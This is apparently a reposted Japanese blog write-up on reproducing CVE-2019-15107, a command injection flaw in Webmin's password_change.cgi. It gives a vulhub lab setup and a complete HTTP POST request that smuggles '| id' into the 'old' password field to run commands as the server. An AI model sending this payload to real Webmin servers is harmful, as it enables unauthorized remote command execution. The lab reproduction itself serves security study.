CVE-2019-15107 Webmin リモート コマンド実行の脆弱性

目次

脆弱性の紹介

影響を受けるバージョン

環境構築

脆弱性の再発


脆弱性の紹介

Webmin は現在、最も強力な Web ベースの Unix システム管理ツールです。管理者はブラウザを通じて Webmin のさまざまな管理機能にアクセスし、対応する管理アクションを実行します。この脆弱性は、パスワードのリセット機能のpassword_change.cgi ファイルにあるコード実行の脆弱性が原因で発生し、悪意のある第三者が入力検証なしで悪意のあるコードを実行する可能性があります。

影響を受けるバージョン

  • ウェブミン<=1.920

環境構築

  • cd /root/vulhub/webmin/CVE-2019-15107
  • docker-compose up -d
  • 対象の Web サイトにアクセスします: https://Your-IP:10000

脆弱性の再発

1. 次のペイロードを構築します

POST /password_change.cgi HTTP/1.1
Host: IP:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://IP:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

user=rootxx&pam=&expired=2&old=test| id &new1=test2&new2=test2

2. burp を使用してパケットをキャプチャし、変更します。id コマンドが正常に実行されたことがわかります。(送信されたユーザー パラメーターの値が既知の Linux ユーザーではない場合にのみ、`/etc/shadow` が変更された場所に入り、コマンド インジェクションの脆弱性が引き起こされます。)

おすすめ

転載: blog.csdn.net/smli_ng/article/details/115980423